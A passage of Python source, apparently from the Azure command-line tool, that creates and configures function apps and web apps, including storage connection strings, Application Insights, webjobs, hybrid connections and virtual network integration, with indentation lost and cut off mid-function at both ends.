site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
client = web_client_factory(cmd.cli_ctx)
vnet_client = network_client_factory(cmd.cli_ctx)
subnet_resource_id = _validate_subnet(cmd.cli_ctx, subnet, vnet, resource_group_name)
if slot is None:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
else:
swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
name, slot)
# check to see if the connection would be supported
if swift_connection_info.swift_supported is not True:
return logger.warning("""Your app must be in an Azure App Service deployment that is
capable of scaling up to Premium v2\nLearn more:
https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
subnet_id_parts = parse_resource_id(subnet_resource_id)
subnet_subscription_id = subnet_id_parts['subscription']
vnet_name = subnet_id_parts['name']
vnet_resource_group = subnet_id_parts['resource_group']
subnet_name = subnet_id_parts['child_name_1']
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
from azure.cli.core.commands.client_factory import get_subscription_id
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
swift_supported=True)
return_vnet = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_swift_virtual_network_connection', slot, swiftVnet)
# Enalbe Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
# reformats the vnet entry, removing unnecessary information
id_strings = return_vnet.id.split('/')
resourceGroup = id_strings[4]
mod_vnet = {
"id": return_vnet.id,
"location": return_vnet.additional_properties["location"],
"name": return_vnet.name,
"resourceGroup": resourceGroup,
"subnetResourceId": return_vnet.subnet_resource_id
}
return mod_vnet
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation.".format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, loc, os_name, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
os_name=os_name,
